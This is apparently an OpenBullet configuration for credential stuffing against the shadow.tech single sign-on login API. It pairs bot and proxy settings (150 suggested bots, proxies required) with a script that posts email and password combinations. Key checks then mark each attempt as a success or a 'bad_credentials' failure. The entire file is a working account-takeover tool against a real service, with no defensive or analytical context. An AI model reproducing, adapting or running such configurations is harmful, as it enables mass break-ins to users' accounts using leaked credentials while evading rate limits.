[SETTINGS]
{
  "Name": "shadow.tech",
  "SuggestedBots": 150,
  "MaxCPM": 0,
  "LastModified": "2019-07-01T17:12:25.1016805-07:00",
  "AdditionalInfo": "",
  "Author": "",
  "Version": "1.1.3",
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
REQUEST POST "https://sso.api-web.shadow.tech/api/v1/user/login" 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  HEADER "Origin: https://sso.shadow.tech" 
  HEADER "Referer: https://sso.shadow.tech/" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "{\"success\":false,\"error\":\"bad_credentials\"}" 
  KEYCHAIN Success OR 
    KEY "{\"success\":true" 

